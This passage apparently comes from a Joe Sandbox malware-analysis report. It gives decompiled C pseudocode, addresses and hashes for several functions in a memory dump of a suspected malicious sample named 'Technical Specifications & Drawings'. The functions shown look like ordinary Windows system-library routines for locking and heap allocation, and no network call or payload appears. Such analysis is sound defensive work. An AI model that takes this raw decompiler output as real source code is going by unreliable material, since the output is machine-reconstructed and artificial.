					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E017A9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7746c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E017A2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                  0x017bef4b
                                                  0x017bef4d
                                                  0x017bef57
                                                  0x017bf0bd
                                                  0x017bf0c2
                                                  0x017bf0d2
                                                  0x017bf0d2
                                                  0x017bf0c2
                                                  0x017bef5d
                                                  0x017bef5f
                                                  0x017bef67
                                                  0x017bef6a
                                                  0x017bef6d
                                                  0x017bef74
                                                  0x017bef7f
                                                  0x017bef82
                                                  0x017bef82
                                                  0x017bef86
                                                  0x017bef88
                                                  0x017bef8c
                                                  0x017bef8f
                                                  0x017bef8f
                                                  0x017bef8f
                                                  0x00000000
                                                  0x017bef91
                                                  0x017bef93
                                                  0x017befc4
                                                  0x017befc4
                                                  0x017befc4
                                                  0x017befca
                                                  0x017befd0
                                                  0x017bf0a6
                                                  0x00000000
                                                  0x00000000
                                                  0x017bf0af
                                                  0x0180bb06
                                                  0x0180bb0a
                                                  0x017bf0b5
                                                  0x017bf0b5
                                                  0x017bf0b5
                                                  0x017bf0b5
                                                  0x00000000
                                                  0x017befd6
                                                  0x017befd9
                                                  0x017bf0de
                                                  0x017bf0e2
                                                  0x017befdf
                                                  0x017befdf
                                                  0x017befdf
                                                  0x017befe5
                                                  0x0180bafc
                                                  0x0180bafc
                                                  0x017befe5
                                                  0x017befeb
                                                  0x017befed
                                                  0x017bf00f
                                                  0x017bf011
                                                  0x017bf01a
                                                  0x017bf01d
                                                  0x017bf021
                                                  0x017bf028
                                                  0x017bf029
                                                  0x017bf029
                                                  0x017bf02c
                                                  0x00000000
                                                  0x017bf02c
                                                  0x017beff3
                                                  0x017beff9
                                                  0x017bf0ea
                                                  0x017bf0ed
                                                  0x017bf0ef
                                                  0x00000000
                                                  0x017bf0ef
                                                  0x017bf003
                                                  0x0180bb12
                                                  0x017bf045
                                                  0x017bf049
                                                  0x017bf051
                                                  0x017bf09e
                                                  0x017bf0a0
                                                  0x017bf0a0
                                                  0x017bf09e
                                                  0x017bf053
                                                  0x017bf064
                                                  0x017bf064
                                                  0x017bf06b
                                                  0x0180bb1a
                                                  0x0180bb1a
                                                  0x017bf071
                                                  0x017bf071
                                                  0x017bf07d
                                                  0x017bf082
                                                  0x017bf08f
                                                  0x017bf08f
                                                  0x017bf009
                                                  0x017bf00d
                                                  0x00000000
                                                  0x017bf00d
                                                  0x017befd0
                                                  0x017bef97
                                                  0x017befa5
                                                  0x017befaa
                                                  0x00000000
                                                  0x017befac
                                                  0x017befac
                                                  0x017befac
                                                  0x00000000
                                                  0x017befb2
                                                  0x017bf036
                                                  0x017bf03a
                                                  0x017bf040
                                                  0x017bf090
                                                  0x00000000
                                                  0x017bf092
                                                  0x017bf042
                                                  0x00000000
                                                  0x017bf042
                                                  0x017befb7
                                                  0x017befb9
                                                  0x017befbc
                                                  0x017befb0
                                                  0x017befb0
                                                  0x00000000
                                                  0x017befbe
                                                  0x017befbe
                                                  0x017befc1
                                                  0x00000000
                                                  0x017befc1
                                                  0x017befbc
                                                  0x017befaa
                                                  0x017bef91

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                  • Instruction ID: 7579618e380c244648db0cd2029394c20670b6480f8a3f98c987a416e6f5aa98
                                                  • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                  • Instruction Fuzzy Hash: 4C510030E04249DFEB25CB6CC8D4BEEFBB1AF05314F1881A8D54597392C775AA89C791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0187740D Relevance: .1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E0187740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E017FD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E017EF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L017C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L017C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E017EF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L017C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                  0x0187740d
                                                  0x0187740d
                                                  0x01877412
                                                  0x01877413
                                                  0x01877416
                                                  0x01877418
                                                  0x0187741c
                                                  0x0187741f
                                                  0x01877422
                                                  0x01877422
                                                  0x01877428
                                                  0x0187742a
                                                  0x0187742a
                                                  0x01877451
                                                  0x01877432
                                                  0x0187744f
                                                  0x0187744f
                                                  0x00000000
                                                  0x01877434
                                                  0x01877438
                                                  0x01877443
                                                  0x01877517
                                                  0x01877517
                                                  0x0187751a
                                                  0x01877535
                                                  0x01877520
                                                  0x01877527
                                                  0x0187752c
                                                  0x01877531
                                                  0x01877533
                                                  0x00000000
                                                  0x01877533
                                                  0x00000000
                                                  0x01877531
                                                  0x0187754b
                                                  0x0187754f
                                                  0x0187755c
                                                  0x0187755c
                                                  0x0187755f
                                                  0x01877560
                                                  0x01877561
                                                  0x01877562
                                                  0x01877563
                                                  0x01877568
                                                  0x0187756a
                                                  0x0187756c
                                                  0x0187756d
                                                  0x0187756d
                                                  0x0187756f
                                                  0x01877572
                                                  0x01877574
                                                  0x01877577
                                                  0x0187757c
                                                  0x0187757f
                                                  0x00000000
                                                  0x01877551
                                                  0x01877551
                                                  0x01877551
                                                  0x01877553
                                                  0x01877553
                                                  0x01877449
                                                  0x01877449
                                                  0x0187744c
                                                  0x0187744c
                                                  0x00000000
                                                  0x0187744c
                                                  0x01877443
                                                  0x0187750e
                                                  0x01877514
                                                  0x01877514
                                                  0x01877455
                                                  0x01877469
                                                  0x0187746d
                                                  0x00000000
                                                  0x01877473
                                                  0x01877473
                                                  0x01877476
                                                  0x01877480
                                                  0x01877484
                                                  0x0187748e
                                                  0x01877493
                                                  0x01877493
                                                  0x01877496
                                                  0x01877499
                                                  0x018774a1
                                                  0x018774b1
                                                  0x018774b5
                                                  0x00000000
                                                  0x018774bb
                                                  0x018774c1
                                                  0x018774c1
                                                  0x018774c4
                                                  0x018774c5
                                                  0x018774c6
                                                  0x018774c7
                                                  0x018774c8
                                                  0x018774cd
                                                  0x00000000
                                                  0x018774d3
                                                  0x018774d3
                                                  0x018774d6
                                                  0x018774d8
                                                  0x018774db
                                                  0x018774dd
                                                  0x018774e0
                                                  0x018774e7
                                                  0x018774ee
                                                  0x018774ee
                                                  0x018774f4
                                                  0x018774f9
                                                  0x00000000
                                                  0x018774fb
                                                  0x018774fb
                                                  0x018774fd
                                                  0x01877500
                                                  0x01877503
                                                  0x01877505
                                                  0x01877505
                                                  0x018774f9
                                                  0x00000000
                                                  0x018774cd
                                                  0x018774b5
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                  • Instruction ID: 290c1b088fdaaeb602c8c5d8c7888ec283af2010f80565dffddd394f9595bcc6
                                                  • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                  • Instruction Fuzzy Hash: E0517A71600646EFDB26CF18C484A96FBF5FF45704F1481AAE908DF216E371EA46CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D2990 Relevance: .1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E017D2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x187ff00);
				E017FD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1781664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E017EE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1781668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E018251BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x178166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E017D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E017B6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E017D2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E017D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E017D2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E017D2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E017FD0D1(_t62);
				goto L28;
			}





















                                                  0x017d2990
                                                  0x017d2992
                                                  0x017d2997
                                                  0x017d29a3
                                                  0x017d29a6
                                                  0x017d29ab
                                                  0x017d29ad
                                                  0x017d29b2
                                                  0x01815c80
                                                  0x017d29b8
                                                  0x017d29b8
                                                  0x017d29bb
                                                  0x017d29c0
                                                  0x017d29c5
                                                  0x017d29c6
                                                  0x017d29c6
                                                  0x017d29cb
                                                  0x00000000
                                                  0x00000000
                                                  0x017d29cd
                                                  0x017d29d0
                                                  0x017d29d9
                                                  0x017d29db
                                                  0x017d29dd
                                                  0x017d2a7f
                                                  0x017d2a84
                                                  0x017d2a87
                                                  0x017d2a89
                                                  0x01815ca1
                                                  0x01815ca3
                                                  0x00000000
                                                  0x017d2a8f
                                                  0x017d2a8f
                                                  0x00000000
                                                  0x017d2a8f
                                                  0x00000000
                                                  0x017d29e3
                                                  0x017d29e3
                                                  0x017d29e3
                                                  0x00000000
                                                  0x017d29e3
                                                  0x017d29dd
                                                  0x00000000
                                                  0x017d29db
                                                  0x017d29e6
                                                  0x017d29e9
                                                  0x017d29eb
                                                  0x017d29ed
                                                  0x017d29f3
                                                  0x017d29f5
                                                  0x017d29f8
                                                  0x017d29fa
                                                  0x017d2a97
                                                  0x017d2a9a
                                                  0x017d2a9d
                                                  0x017d2add
                                                  0x00000000
                                                  0x017d2a9f
                                                  0x017d2aa2
                                                  0x017d2aa5
                                                  0x017d2aa8
                                                  0x017d2aab
                                                  0x01815cab
                                                  0x01815caf
                                                  0x01815cc5
                                                  0x01815cda
                                                  0x01815cdc
                                                  0x01815cdf
                                                  0x01815ce5
                                                  0x00000000
                                                  0x01815ceb
                                                  0x01815ced
                                                  0x01815cee
                                                  0x00000000
                                                  0x01815cee
                                                  0x01815cb1
                                                  0x01815cb4
                                                  0x01815cb9
                                                  0x01815cbb
                                                  0x00000000
                                                  0x01815cbd
                                                  0x01815cbd
                                                  0x00000000
                                                  0x01815cbd
                                                  0x01815cbb
                                                  0x017d2ab1
                                                  0x017d2ab1
                                                  0x017d2ac4
                                                  0x017d2ac6
                                                  0x017d2ac6
                                                  0x00000000
                                                  0x017d2ac6
                                                  0x017d2aab
                                                  0x00000000
                                                  0x017d2a00
                                                  0x017d2a09
                                                  0x017d2a0e
                                                  0x017d2a21
                                                  0x017d2a24
                                                  0x017d2a35
                                                  0x017d2a3a
                                                  0x017d2a3d
                                                  0x017d2a42
                                                  0x017d2a59
                                                  0x017d2a59
                                                  0x017d2a5c
                                                  0x017d2a5f
                                                  0x017d2a5f
                                                  0x017d29fa
                                                  0x017d29f3
                                                  0x017d2a64
                                                  0x017d2a64
                                                  0x017d2a6b
                                                  0x017d2a6b
                                                  0x017d2a6d
                                                  0x017d2a72
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7389688c56e8d5fa2b8b191012564c60e4d6aaf59a35f2b96a8ce76a160b7a28
                                                  • Instruction ID: 4825858d1082cf4573eb08fa09ecbd359079a926c72452bf7f4d9d94f81f3606
                                                  • Opcode Fuzzy Hash: 7389688c56e8d5fa2b8b191012564c60e4d6aaf59a35f2b96a8ce76a160b7a28
                                                  • Instruction Fuzzy Hash: E6515971A0020AEFDF25DF59C880ADEBBB5FF88310F148155E914AB226D7359A52CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D4BAD Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E017D4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x189d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E017ACC50(_t86);
					L11:
					return E017EB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1898504
				E017C2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E017EFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E017EB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L017C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E017ACCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1898504
								E017BFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E017D4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                  0x017d4bad
                                                  0x017d4bbf
                                                  0x017d4bc2
                                                  0x017d4bc6
                                                  0x017d4bcd
                                                  0x017d4bd9
                                                  0x018167fe
                                                  0x01816800
                                                  0x017d4ccc
                                                  0x017d4ccd
                                                  0x017d4cb7
                                                  0x017d4cc9
                                                  0x017d4cc9
                                                  0x017d4bdf
                                                  0x017d4be5
                                                  0x00000000
                                                  0x00000000
                                                  0x017d4beb
                                                  0x017d4bef
                                                  0x00000000
                                                  0x00000000
                                                  0x017d4bf5
                                                  0x017d4bf9
                                                  0x017d4c06
                                                  0x017d4c0b
                                                  0x017d4c17
                                                  0x017d4c1c
                                                  0x017d4c1f
                                                  0x017d4c25
                                                  0x017d4c33
                                                  0x017d4c3d
                                                  0x017d4c40
                                                  0x017d4c43
                                                  0x017d4c47
                                                  0x017d4c4d
                                                  0x017d4c53
                                                  0x017d4c54
                                                  0x017d4c55
                                                  0x017d4c56
                                                  0x017d4c5b
                                                  0x017d4c5c
                                                  0x017d4c63
                                                  0x017d4c6b
                                                  0x00000000
                                                  0x00000000
                                                  0x01816776
                                                  0x01816784
                                                  0x01816784
                                                  0x0181679f
                                                  0x018167a7
                                                  0x018167af
                                                  0x018167ce
                                                  0x00000000
                                                  0x018167b1
                                                  0x018167b7
                                                  0x018167b8
                                                  0x018167c1
                                                  0x018167d3
                                                  0x018167d9
                                                  0x018167dd
                                                  0x017d4c94
                                                  0x017d4c94
                                                  0x017d4c98
                                                  0x017d4c9c
                                                  0x017d4ca3
                                                  0x018167f4
                                                  0x018167f4
                                                  0x017d4cb5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017d4cb5
                                                  0x017d4c79
                                                  0x017d4c7e
                                                  0x017d4c89
                                                  0x017d4c8b
                                                  0x017d4c8f
                                                  0x017d4c8f
                                                  0x00000000
                                                  0x017d4c89
                                                  0x018167c3
                                                  0x00000000
                                                  0x018167c3
                                                  0x018167af
                                                  0x017d4c73
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
